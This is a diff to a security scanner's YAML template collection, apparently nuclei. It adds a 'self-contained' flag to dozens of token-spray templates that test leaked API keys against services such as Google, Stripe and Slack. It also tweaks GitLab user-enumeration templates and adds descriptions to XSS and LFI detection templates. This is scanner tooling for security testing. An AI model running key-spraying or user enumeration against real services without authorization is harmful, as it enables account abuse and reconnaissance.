   - method: GET
     path:

token-spray/google-customsearch.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,search
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-directions.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,directions
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-elevation.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,elevation
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-fcm.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,fcm,firebase,cloud,messaging
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/google-findplacefromtext.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,find,text
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-gedistancematrix.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,distance,matrix
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-geocode.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,geocode
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-geolocation.yaml

@@ -6,19 +6,21 @@ info:
   severity: info
   tags: token-spray,google,geolocation
 
+self-contained: true
 requests:
   - method: GET
     path:
       - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
-    matchers-condition: and
 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
+        negative: true
         words:
           - 'error'
-        negative: true
+
       - type: status
+        negative: true
         status:
           - 404
-        negative: true

token-spray/google-mapsembed.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,maps,embed
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-mapsembedadvanced.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,maps,embed
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-nearbysearch.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,search,nearby
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-nearestroads.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,roads
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-placedetails.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,place,details
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-placesphoto.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,places,photo
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-playablelocations.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,playable,locations
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-routetotraveled.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,route
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-speedlimit.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,speed,limit
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-staticmaps.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,maps
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-streetview.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,streetview
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/google-timezone.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,timezone
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/googlet-extsearchplaces.yaml

@@ -6,6 +6,7 @@ info:
   severity: info
   tags: token-spray,google,search,places,text
 
+self-contained: true
 requests:
   - method: GET
     path:
@@ -14,6 +15,6 @@ requests:
     matchers:
       - type: word
         part: body
+        negative: true
         words:
           - 'error_message'
-        negative: true

token-spray/heroku.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,heroku
 
+self-contained: true
 requests:
   - method: POST
     path:
@@ -17,9 +18,9 @@ requests:
 
     matchers:
       - type: status
+        condition: or
         status:
           - 200
           - 201
           - 202
           - 206
-        condition: or

token-spray/hubspot.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,hubspot
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/instagram.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,instagram,graph
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/ipstack.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,ipstack
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/iterable.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,iterable
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/jumpcloud.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,jumpcloud
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/lokalise.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,lokalise
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/loqate.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,loqate
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/mailchimp.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,mailchimp
 
+self-contained: true
 network:
   - inputs:
       - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"

token-spray/mailgun.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,mailgun
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/mapbox.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,mapbox
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/nerdgraph.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,newrelic,nerdgraph
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/npm.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,node,npm,package,manager
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/openweather.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,weather,openweather
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/pagerduty.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,pagerduty
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/pendo.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,pendo
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/pivotaltracker.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,pivotaltracker
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/postmark.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,postmark
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/sendgrid.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,sendgrid
 
+self-contained: true
 network:
   - inputs:
       - data: "ehlo\r\n"

token-spray/slack.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,slack
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/sonarcloud.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,sonarcloud
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/spotify.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,spotify
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/square.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,square
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/stripe.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,stripe
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/tinypng.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,tinypng
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/travisci.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,travis
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/twitter.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,twitter
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/visualstudio.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,visualstudio,microsoft
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/wakatime.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,wakatime
 
+self-contained: true
 requests:
   - method: GET
     path:

token-spray/weglot.yaml

@@ -7,6 +7,7 @@ info:
   severity: info
   tags: token-spray,weglot
 
+self-contained: true
 requests:
   - method: POST
     path:

token-spray/youtube.yaml

@@ -7,17 +7,19 @@ info:
   severity: info
   tags: token-spray,youtube
 
+self-contained: true
 requests:
   - method: GET
     path:
       - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
-    matchers-condition: or
 
+    matchers-condition: or
     matchers:
       - type: word
         part: body
         words:
           - 'quotaExceeded'
+
       - type: status
         status:
           - 200

vulnerabilities/gitlab/gitlab-user-enumeration.yaml

@@ -16,10 +16,9 @@ requests:
         Accept: application/json, text/plain, */*
         Referer: {{BaseURL}}
 
+    threads: 50
     payloads:
       user: helpers/wordlists/user-list.txt
-    attack: sniper
-    threads: 50
 
     matchers-condition: and
     matchers:

vulnerabilities/gitlab/gitlab-user-open-api.yaml

@@ -15,10 +15,9 @@ requests:
         Accept: application/json, text/plain, */*
         Referer: {{BaseURL}}
 
+    threads: 50
     payloads:
       uid: helpers/wordlists/numbers.txt
-    attack: sniper
-    threads: 50
 
     matchers-condition: and
     matchers:

vulnerabilities/oracle/oracle-siebel-xss.yaml

@@ -4,6 +4,7 @@ info:
   name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
   author: dhiyaneshDK
   severity: medium
+  description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
   reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
   tags: xss,oracle
 

vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml

@@ -4,6 +4,7 @@ info:
   name: CS-Cart unauthenticated LFI
   author: 0x_Akoko
   severity: high
+  description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content.
   reference: https://cxsecurity.com/issue/WLB-2020100100
   tags: cscart,lfi
 

vulnerabilities/other/lucee-xss.yaml

@@ -4,6 +4,7 @@ info:
   name: Lucee Unauthenticated Reflected XSS
   author: incogbyte
   severity: medium
+  description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
   tags: lucee,xss
 
 requests: